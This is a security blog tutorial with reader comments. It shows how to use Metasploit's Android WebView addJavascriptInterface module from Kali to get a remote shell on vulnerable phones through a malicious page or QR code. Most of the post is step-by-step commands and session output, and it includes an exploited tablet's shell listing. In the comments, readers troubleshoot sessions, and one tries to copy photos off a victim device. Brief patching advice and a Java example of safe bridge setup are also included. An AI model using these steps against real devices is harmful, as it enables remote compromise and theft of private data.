Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.
Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.
And here is the kicker: about 70% of Android devices (phones and tablets) are vulnerable to it!
This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:
1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.
2. Type, “use exploit/android/browser/webview_addjavascriptinterface”.
3. Then type, “show options” to see what needs to be set:
For the most part, you are good to go. You can turn on SSL or change the port or host address if you want, but the one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.
“Security” sounded reassuring.
4. Enter, “set URIPATH Security”:
5. Finally, type “exploit”:
A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.
Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:
Now just connect to the session using “sessions -i 1”:
And that is it! You are connected to the Android device.
But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:
Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.
A quick check of the path with “echo $PATH” revealed that no path was set:
So I set it by typing, “export PATH=/system/bin:$PATH”:
Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:
As you can see, I had a complete remote shell to the Android device.
All I had to do was visit a malicious page using the built-in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.
So what can you do to protect yourself against this type of attack?
The exploit only works on versions of Android below 4.2, which apparently is 70% of current devices…
Update your device to the latest version of Android (if it will update); check with your manufacturer for instructions.
Also, never scan in QR Codes from unknown sources.
But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.
I am not sure whether this will be true for all devices; again, the best course of action would be to update to the latest OS version.
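As an added example, not code from the original post, here is the developer side of the same hole in Java: the unconditional addJavascriptInterface call that leaves an app exposed on Android below 4.2, beside the version that only installs the bridge where the platform enforces @JavascriptInterface. AppBridge and its appVersion method are hypothetical names.

```java
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

// Added example, not code from the original post. AppBridge is a hypothetical
// object an app exposes to page JavaScript as window.AppBridge.
public final class WebViewBridgeExample {

    public static final class AppBridge {
        // From API 17 (Android 4.2) on, and only if the app declares
        // targetSdkVersion 17 or higher, page script can call just the
        // methods carrying this annotation. Below 4.2 the annotation is
        // ignored and every public method of the object is reachable,
        // including those inherited from java.lang.Object.
        @JavascriptInterface
        public String appVersion() {
            return "1.0"; // constructed value
        }
    }

    // Exposed pattern: the bridge is installed on every Android version, so on
    // a device below 4.2 any page the WebView loads gets the whole object.
    public static void configureUnconditionally(WebView webView) {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new AppBridge(), "AppBridge");
    }

    // Hardened pattern: install the bridge only where the platform enforces
    // @JavascriptInterface; on older devices the app runs without it.
    // Returns whether the bridge was installed so callers can degrade cleanly.
    public static boolean configureHardened(WebView webView) {
        webView.getSettings().setJavaScriptEnabled(true);
        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR1) {
            return false; // Android < 4.2: no safe way to expose Java here
        }
        webView.addJavascriptInterface(new AppBridge(), "AppBridge");
        return true;
    }
}
```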
Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux”.
hi … what was your browser name?
For this I just used the built-in Android Browser.
I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas?
Are you running Kali in a Virtual Machine? I have seen the anti-virus/firewall running on a Virtual Machine catch and block several of the exploits.
I am! This was running in an Oracle VirtualBox VM. Thanks for the feedback; I’ll try this from a native install tonight.
Hello again! I’m trying to get this working for a project for graduate school, and I’m still hitting difficulties. I’ll let you know what I’ve done in case I’ve missed a dependency somewhere.
1) Loaded Kali Linux from a Live CD (Not a VM this time).
2) Copied the Ruby code from Rapid7’s website into /root/.msf4/modules/exploits/android/browser/webview_addjavascriptinterface.rb
3) Loaded Applications–> Kali Linux–> System Services–> Metasploit–> community / pro start
4) In a terminal, loaded msfconsole
5) Followed your guide to “use exploit/android/browser/webview_addjavascriptinterface” and set URIPATH
6) Navigated to this site from a vulnerable phone.
The phone redirects to /Security/(random string) and Metasploit shows “Gathering target information” and “Serving exploit HTML”, but still, no connection/session is ever made. Any guidance would be appreciated. I appreciate the help! My next step may be to load an older ROM on the device in case Moto/Verizon silently released a patch somehow.
The phone is a Verizon Droid RAZR MAXX OS 4.1.2.
I’ve also tried using a TMobile HTC MyTouch (OS: 2.3.4) but this may be too out of date.
It is in the newer versions of Metasploit so you really don’t need to download the code from Rapid7. Just type “msfupdate” and it should pull down the latest exploits and updates for Metasploit. Maybe it needs something else in the updates to function? But your target system might have been patched for the exploit. I have a Kyocera phone that should be vulnerable by OS Version, but the Browser was patched so it isn’t.
Can you confirm if this would also work from a Windows installation of Metasploit?
I followed your guide, but used it from a Windows install. I get to the part where my Android unit creates a session with the console; I connect to that console number to interact, however, nothing happens after that.
I enter commands and get no return to the console. Are there any ideas that you can pass my way?
This is the last thing the console shows…
GET /lolcat HTTP/1.1
Host: 192.168.1.137:4444
Connection: keep-alive
Referer: http://goo.gl/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; KENWOOD DNN 2013 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
As an update to this, I can answer my own question. The answer is yes – the exploit works in Windows and Linux.
However, all of the devices and ADV builds (4.0, 4.03, 4.2 etc) all do the same thing – the final log in Metasploit is “Serving exploit HTML” followed by nothing.
Can anyone confirm if they were able to get this exploit to work in ADV with any android 4.x images?
Hello
I have the same problem. If I work with the SDK emulator, everything is all right. I tested it with a real smartphone and had the same problems as Chris.
I actually couldn’t get it working with a couple emulators, but got it working on about 50% of the Android devices I have tested so far – Phones and tablets. It is odd though, some devices that should be vulnerable by Android version number didn’t seem to be.
Hi
I have access to the tablet! I can read the devices and can run some shell commands. But when I want to steal a picture with
dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
I get the response /dev/sdc: cannot open for write: Permission denied
On Kali Linux I use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN).
msf exploit(webview_addjavascriptinterface) > [*] 192.168.178.23 webview_addjavascriptinterface - Gathering target information.
[*] 192.168.178.23 webview_addjavascriptinterface - Sending response HTML.
[*] 192.168.178.23 webview_addjavascriptinterface - Serving exploit HTML
[*] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000
msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...
export PATH=/system/bin:$PATH
ls -al
drwxr-xr-x root root 2014-05-15 16:56 acct
-rw-r--r-- root root 332 2014-05-15 16:56 boot.txt
drwxrwx--x system cache 2014-05-10 09:22 cache
dr-x------ root root 2014-05-15 16:56 config
lrwxrwxrwx root root 2014-05-15 16:56 d -> /sys/kernel/debug
drwxrwx--x system system 2014-05-12 09:41 data
-rw-r--r-- root root 129 2014-05-15 16:56 default.prop
drwxr-xr-x root root 2014-05-15 17:12 dev
drwxr-xr-x radio radio 2014-05-09 13:55 efs
lrwxrwxrwx root root 2014-05-15 16:56 emmc -> /storage/sdcard1
lrwxrwxrwx root root 2014-05-15 16:56 etc -> /system/etc
-rwxr-x--- root root 105292 2014-05-15 16:56 init
-rwxr-x--- root root 1107 2014-05-15 16:56 init.cm.rc
-rwxr-x--- root root 2344 2014-05-15 16:56 init.goldfish.rc
-rwxr-x--- root root 5171 2014-05-15 16:56 init.p1-common.rc
-rwxr-x--- root root 5389 2014-05-15 16:56 init.p1.rc
-rwxr-x--- root root 936 2014-05-15 16:56 init.p1.usb.rc
-rwxr-x--- root root 17862 2014-05-15 16:56 init.rc
-rwxr-x--- root root 1637 2014-05-15 16:56 init.trace.rc
-rwxr-x--- root root 3915 2014-05-15 16:56 init.usb.rc
-rw-r--r-- root root 1664 2014-05-15 16:56 lpm.rc
drwxrwxr-x root system 2014-05-15 16:56 mnt
dr-xr-xr-x root root 1970-01-01 00:00 proc
drwxr-xr-x root root 2014-05-09 13:55 radio
drwxr-x--- root root 2014-05-15 16:56 sbin
lrwxrwxrwx root root 2014-05-15 16:56 sdcard -> /storage/sdcard0
d---r-x--- system sdcard_r 2014-05-15 16:56 storage
drwxr-xr-x root root 2014-05-15 16:56 sys
drwxr-xr-x root root 2014-05-09 13:56 system
-rw-r--r-- root root 272 2014-05-15 16:56 ueventd.goldfish.rc
-rw-r--r-- root root 2035 2014-05-15 16:56 ueventd.p1.rc
-rw-r--r-- root root 5075 2014-05-15 16:56 ueventd.rc
lrwxrwxrwx root root 2014-05-15 16:56 vendor -> /system/vendor
I want to copy some pictures to my Kali system but there is the problem:
dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
/dev/sdc: cannot open for write: Permission denied
Or I want to run adb (no device!)
adb devices
* daemon not running. starting it now on port 5038 *
* daemon started successfully *
List of devices attached
Is the phone rooted? If the phone is not rooted, there are several areas that you will not be able to access. For those who root their phone, it is pretty much one of the last lines of defense that you are removing.
The phone is rooted… do you have another idea? I also can’t download any files from the phone to my desktop, but I can delete folders etc. on the phone.
Have you tried the “get” command?
I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas? The OS doesn’t run in a VM.
Not sure, according to Rapid7 the Browser app in 4.1.2 specifically is known to be vulnerable (http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface). Could be that the browser app was updated on the phones that you have tried. One I tried that should have been vulnerable was not, but I did remember seeing a browser app update available that I installed a few days before I tried the exploit on it.
There are other apps that use WebView that should be vulnerable, but I have yet to find a list of them.